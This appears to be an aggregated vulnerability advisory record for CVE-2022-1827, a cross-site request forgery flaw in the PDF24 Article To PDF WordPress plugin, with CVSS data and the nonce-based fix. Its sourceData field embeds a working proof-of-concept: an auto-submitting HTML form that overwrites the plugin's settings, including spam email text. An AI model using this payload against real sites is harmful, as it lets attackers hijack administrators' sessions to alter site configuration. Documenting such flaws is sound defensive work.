Description
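The PDF24 Article To PDF WordPress plugin (through 4.2.2, CVE-2022-1827, CWE-352) does not perform a CSRF check when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack. Because the settings request carries no per-request token, a page on another site can submit it with the admin's existing session. The fix on the plugin side is to emit a nonce in the settings form and verify it on save (in WordPress, `wp_nonce_field()` paired with `check_admin_referer()`), and to check the user's capability before writing the options. This record does not name a fixed release.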
Related
{"id": "WPEX-ID:0BD25283-E079-4010-B139-CCE9AFB1D54D", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "PDF24 Article To PDF <= 4.2.2 - Arbitrary Settings Update via CSRF", "description": "The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack\n", "published": "2022-05-30T00:00:00", "modified": "2022-05-30T09:03:22", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "", "reporter": "Daniel Ruf", "references": [], "cvelist": ["CVE-2022-1827"], "immutableFields": [], "lastseen": "2022-06-28T20:22:47", "viewCount": 15, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}, "sourceData": "<form id=\"test\" action=\"https://example.com/wp-admin/options-general.php?page=pdf24\" method=\"POST\">\r\n <input type=\"text\" name=\"language\" value=\"en\">\r\n <input type=\"text\" name=\"availability\" value=\"public\">\r\n <input type=\"text\" name=\"contentCompression\" value=\"on\">\r\n <input 
type=\"text\" name=\"docOptionsInUse\" value=\"on\">\r\n <input type=\"text\" name=\"docHeader\" value=\"hacked\">\r\n <input type=\"text\" name=\"docSize\" value=\"A4\">\r\n <input type=\"text\" name=\"docOrientation\" value=\"portrait\">\r\n <input type=\"text\" name=\"docStyle\" value=\"\">\r\n <input type=\"text\" name=\"docDefaultFilename\" value=\"\">\r\n <input type=\"text\" name=\"docHomeFilename\" value=\"\">\r\n <input type=\"text\" name=\"docSingleFilename\" value=\"\">\r\n <input type=\"text\" name=\"docPageFilename\" value=\"\">\r\n <input type=\"text\" name=\"docCategoryFilename\" value=\"\">\r\n <input type=\"text\" name=\"docSearchFilename\" value=\"\">\r\n <input type=\"text\" name=\"emailOptionsInUse\" value=\"on\">\r\n <input type=\"text\" name=\"emailType\" value=\"text/plain\">\r\n <input type=\"text\" name=\"emailSubject\" value=\"hacked\">\r\n <input type=\"text\" name=\"emailFrom\" value=\"hacked\">\r\n <input type=\"text\" name=\"emailText\" value=\"please buy my rolex\">\r\n <input type=\"text\" name=\"cpInUse\" value=\"on\">\r\n <input type=\"text\" name=\"cpDisplayMode\" value=\"bottom\">\r\n <input type=\"text\" name=\"cpStyle\" value=\"default_elbf\">\r\n <textarea name=\"cpCustomStyle\">.pdf24Plugin-cp {\r\n\tborder:1px solid silver;\r\n}\r\n\r\n.pdf24Plugin-cp input[type=\"text\"] {\r\n\twidth:200px;\r\n\tborder:1px solid silver;\r\n\tmargin:0;\r\n\tpadding:2px;\r\n}\r\n\r\n.pdf24Plugin-cp input[type=\"submit\"] {\r\n\tmargin:0;\r\n\tpadding:2px 10px !important;\r\n}\r\n\r\n.pdf24Plugin-cp form {\r\n\tmargin:0;\r\n\tpadding:0;\r\n}\r\n\r\n.pdf24Plugin-cp img {\r\n\theight:32px;\r\n}\r\n\r\n.pdf24Plugin-cp span, .pdf24Plugin-cp input, .pdf24Plugin-cp img {\r\n\tvertical-align:middle;\r\n}\r\n\r\n.pdf24Plugin-cp * {\r\n\tfont-size:90%;\r\n}</textarea>\r\n <input type=\"text\" name=\"sbpInUse\" value=\"on\">\r\n <input type=\"text\" name=\"sbpStyle\" value=\"default_dsbfl\">\r\n <textarea name=\"sbpCustomStyle\">.pdf24Plugin-sbp 
{\r\n\ttext-align:center;\r\n\tborder: 1px solid silver;\r\n\tpadding: 5px;\r\n}\r\n.pdf24Plugin-sbp-link a {\r\n\tfont-weight:bold;\r\n}\r\n.pdf24Plugin-sbp-bl {\r\n\tfont-size:smaller;\r\n}</textarea>\r\n <input type=\"text\" name=\"tbpStyle\" value=\"default_dflb\">\r\n <textarea name=\"tbpCustomStyle\">.pdf24Plugin-tbp {\r\n\tpadding: 3px;\r\n\twidth:600px;\r\n\tmargin:auto;\r\n}\r\n.pdf24Plugin-tbp * {\r\n\tfont-size: 90%;\r\n}</textarea>\r\n <input type=\"text\" name=\"lpStyle\" value=\"default_dfl\">\r\n <textarea name=\"lpCustomStyle\">.pdf24Plugin-lp-link a {\r\n}</textarea>\r\n <input type=\"text\" name=\"lang-enterEmail\" value=\"Enter email address\">\r\n <input type=\"text\" name=\"lang-send\" value=\"Send\">\r\n <input type=\"text\" name=\"lang-sendArticleAsPDF\" value=\"Send article as PDF\">\r\n <input type=\"text\" name=\"lang-sendArticlesAsPDF\" value=\"Send articles as PDF\">\r\n <input type=\"text\" name=\"lang-downloadArticleAsPDF\" value=\"Download article as PDF\">\r\n <input type=\"text\" name=\"lang-downloadArticlesAsPDF\" value=\"Download articles as PDF\">\r\n <input type=\"text\" name=\"lang-createPDF\" value=\"Create PDF\">\r\n <textarea name=\"docTpl\"><html>\r\n<head>\r\n\t<base href=\"{baseUrl}\" />\r\n\t<title>{headline}</title>\r\n\t<meta http-equiv=\"content-type\" content=\"text/html; charset={charset}\" />\t\r\n\t<style type=\"text/css\">\r\n\t\t{css}\r\n\t</style>\r\n</head>\r\n<body>\r\n\t<h1><a href=\"{headlineUrl}\">{headline}</a></h1>\r\n\t<div>{content}</div>\r\n</body>\r\n</html></textarea>\r\n <textarea name=\"docEntryTpl\"><div class=\"bodyPart\">\r\n\t<h2><a href=\"{url}\">{title}</a></h2>\r\n\t<div class=\"meta\">{dateTime} {author}</div>\r\n\t<div class=\"text\">{text}</div>\r\n</div></textarea>\r\n <input type=\"text\" name=\"update\" value=\"Save Changes\">\r\n</form>\r\n<script>\r\n document.getElementById(\"test\").submit();\r\n</script>", "generation": 0}
{"cve": [{"lastseen": "2022-06-28T18:19:17", "description": "The PDF24 Article To PDF WordPress plugin through 4.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-06-20T11:15:00", "type": "cve", "title": "CVE-2022-1827", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1827"], "modified": "2022-06-28T16:42:00", "cpe": ["cpe:/a:pdf24_articles_to_pdf_project:pdf24_articles_to_pdf:4.2.2"], "id": "CVE-2022-1827", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1827", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:pdf24_articles_to_pdf_project:pdf24_articles_to_pdf:4.2.2:*:*:*:*:wordpress:*:*"]}], "wpvulndb": [{"lastseen": "2022-06-28T20:22:47", "description": "The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack\n\n### PoC\n\n.pdf24Plugin-cp { border:1px solid silver; } 
.pdf24Plugin-cp input[type=\"text\"] { width:200px; border:1px solid silver; margin:0; padding:2px; } .pdf24Plugin-cp input[type=\"submit\"] { margin:0; padding:2px 10px !important; } .pdf24Plugin-cp form { margin:0; padding:0; } .pdf24Plugin-cp img { height:32px; } .pdf24Plugin-cp span, .pdf24Plugin-cp input, .pdf24Plugin-cp img { vertical-align:middle; } .pdf24Plugin-cp * { font-size:90%; } .pdf24Plugin-sbp { text-align:center; border: 1px solid silver; padding: 5px; } .pdf24Plugin-sbp-link a { font-weight:bold; } .pdf24Plugin-sbp-bl { font-size:smaller; } .pdf24Plugin-tbp { padding: 3px; width:600px; margin:auto; } .pdf24Plugin-tbp * { font-size: 90%; } .pdf24Plugin-lp-link a { }\n\n# [{headline}](<{headlineUrl}>)\n\n{content}\n\n## [{title}](<{url}>)\n\n{dateTime} {author}\n\n{text}\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-05-30T00:00:00", "type": "wpvulndb", "title": "PDF24 Article To PDF <= 4.2.2 - Arbitrary Settings Update via CSRF", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1827"], "modified": "2022-05-30T09:03:22", "id": 
"WPVDB-ID:0BD25283-E079-4010-B139-CCE9AFB1D54D", "href": "https://wpscan.com/vulnerability/0bd25283-e079-4010-b139-cce9afb1d54d", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}